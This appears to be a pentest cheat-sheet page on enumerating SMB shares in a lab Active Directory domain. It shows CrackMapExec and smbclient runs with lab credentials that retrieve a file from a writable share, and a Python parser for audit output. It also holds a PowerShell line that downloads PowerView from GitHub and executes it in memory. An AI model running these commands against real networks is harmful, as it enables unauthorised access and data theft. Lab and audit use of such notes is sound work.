Collecting SMB Shares
Domain user context
cme smb <target(s)> -u <user> -p <passwd> -d <domain> --shares

iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/BC-SECURITY/Empire/master/empire/server/data/module_source/situational_awareness/network/powerview.ps1');
find-domainshare -checkshareaccess

└─# cme smb 192.168.40.150 -u low -p 'Password123!' -d choi.local --shares
SMB 192.168.40.150 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:choi.local) (signing:True) (SMBv1:False)
SMB 192.168.40.150 445 DC01 [+] choi.local\low:Password123!
SMB 192.168.40.150 445 DC01 [+] Enumerated shares
SMB 192.168.40.150 445 DC01 Share Permissions Remark
SMB 192.168.40.150 445 DC01 ----- ----------- ------
< ... >
SMB 192.168.40.150 445 DC01 share READ,WRITE Share for deploying files from the DC Logon server share

└─# smbclient -U CHOI/low%'Password123!' \\\\192.168.40.150\\share
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Mon Jul 4 22:24:07 2022
.. D 0 Mon Jul 4 22:24:07 2022
secret.txt A 18 Mon Jul 4 22:24:07 2022
15644159 blocks of size 4096. 10228069 blocks available
smb: \> get secret.txt
getting file \secret.txt of size 18 as secret.txt (17.6 KiloBytes/sec) (average 17.6 KiloBytes/sec)

Anonymous/Null Session Share
Bulk SMB Information Collection
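When `--shares` output like the listing shown earlier on this page is collected from many hosts during a share-permission audit, the script below parses it and reports every share the tested account can write to. It is an added example, not part of the original page or of CrackMapExec; it assumes whitespace-separated columns and share names without spaces, and the sample lines are constructed.

```python
import re

# Constructed sample modelled on the `cme smb ... --shares` output format.
SAMPLE = """\
SMB 192.168.40.150 445 DC01 [+] choi.local\\low:Password123!
SMB 192.168.40.150 445 DC01 [+] Enumerated shares
SMB 192.168.40.150 445 DC01 Share Permissions Remark
SMB 192.168.40.150 445 DC01 ----- ----------- ------
SMB 192.168.40.150 445 DC01 ADMIN$ Remote Admin
SMB 192.168.40.150 445 DC01 NETLOGON READ Logon server share
SMB 192.168.40.150 445 DC01 share READ,WRITE Share for deploying files from the DC
"""

# The permissions column is optional (empty when the account has no access).
PERM_RE = re.compile(r"^(READ|WRITE)(,(READ|WRITE))*$")

def parse_shares(text):
    """Return one dict per share row: ip, host, share, perms (set), remark."""
    rows, in_table = [], set()          # in_table: IPs whose share table has started
    for line in text.splitlines():
        tok = line.split()
        if len(tok) < 5 or tok[0] != "SMB":
            continue
        ip, host, rest = tok[1], tok[3], tok[4:]
        if rest[:3] == ["Share", "Permissions", "Remark"]:
            in_table.add(ip)            # header row opens the table for this host
            continue
        if rest[0].startswith("["):
            in_table.discard(ip)        # status lines ([*], [+], [-]) are not rows
            continue
        if ip not in in_table or set(rest[0]) == {"-"}:
            continue                    # outside a table, or the dashed separator
        perms, remark = set(), rest[1:]
        if remark and PERM_RE.match(remark[0]):
            perms, remark = set(remark[0].split(",")), remark[1:]
        rows.append({"ip": ip, "host": host, "share": rest[0],
                     "perms": perms, "remark": " ".join(remark)})
    return rows

def writable(rows):
    """Shares where the tested (low-privileged) account holds WRITE."""
    return [r for r in rows if "WRITE" in r["perms"]]

if __name__ == "__main__":
    for r in writable(parse_shares(SAMPLE)):
        print(f'{r["host"]} ({r["ip"]}) \\\\{r["share"]} writable: {r["remark"]}')
```

A remark whose first word is literally `READ` or `WRITE` on a share with no access would be misread as a permission; check such rows by hand.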